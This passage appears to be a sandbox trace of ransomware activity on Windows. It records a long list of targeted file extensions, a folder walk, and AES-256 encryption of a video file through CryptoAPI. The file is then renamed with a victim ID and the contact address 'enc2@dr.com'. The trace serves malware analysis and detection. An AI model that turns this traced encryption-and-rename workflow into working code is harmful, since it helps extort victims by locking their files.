.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".avi") returned 0x0
	[0199.738] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9c7340, ftCreationTime.dwHighDateTime=0x1d96c51, ftLastAccessTime.dwLowDateTime=0x1bb793d0, ftLastAccessTime.dwHighDateTime=0x1d96c8b, ftLastWriteTime.dwLowDateTime=0x1bb793d0, ftLastWriteTime.dwHighDateTime=0x1d96c8b, nFileSizeHigh=0x0, nFileSizeLow=0xb22f, dwReserved0=0x0, dwReserved1=0x0, cFileName="bhA7xl9pVFIpkSXlxcfg.flv", cAlternateFileName="BHA7XL~1.FLV")) returned 1
	[0199.738] lstrcmpW (lpString1="bhA7xl9pVFIpkSXlxcfg.flv", lpString2="..") returned 1
	[0199.738] lstrcmpW (lpString1="bhA7xl9pVFIpkSXlxcfg.flv", lpString2=".") returned 1
	[0199.738] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\"
	[0199.739] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\", lpString2="bhA7xl9pVFIpkSXlxcfg.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\bhA7xl9pVFIpkSXlxcfg.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\bhA7xl9pVFIpkSXlxcfg.flv"
	[0199.739] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\bhA7xl9pVFIpkSXlxcfg.flv") returned 93
	[0199.739] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.739] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\bhA7xl9pVFIpkSXlxcfg.flv", cchLength=0x5d | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv") returned 0x5d
	[0199.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.739] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv", lpSrch="help_decrypt_your_files") returned 0x0
	[0199.739] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv"
	[0199.739] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv") returned 93
	[0199.739] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.740] StrStrW (lpFirst=".flv", lpSrch=".") returned=".flv"
	[0199.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.740] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".flv") returned=".flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0199.740] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.740] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.740] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0199.744] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xb22f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0xb22f, lpOverlapped=0x0) returned 1
	[0199.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.746] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcba18) returned 1
	[0199.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.748] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0199.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.748] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0199.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.748] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb92b0) returned 1
	[0199.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.749] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0xb22f, dwBufLen=0xb22f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0xb230) returned 1
	[0199.749] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.749] RtlMoveMemory (in: Destination=0xfe83b8, Source=0xfdd180, Length=0xb22f | out: Destination=0xfe83b8) 
	[0199.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.750] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe83b8*, pdwDataLen=0x18a1ec*=0xb22f, dwBufLen=0xb230 | out: pbData=0xfe83b8*, pdwDataLen=0x18a1ec*=0xb230) returned 1
	[0199.750] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.750] CryptDestroyKey (hKey=0xfb92b0) returned 1
	[0199.750] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.750] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0199.750] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.750] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0199.750] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.751] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.752] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0199.753] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 135
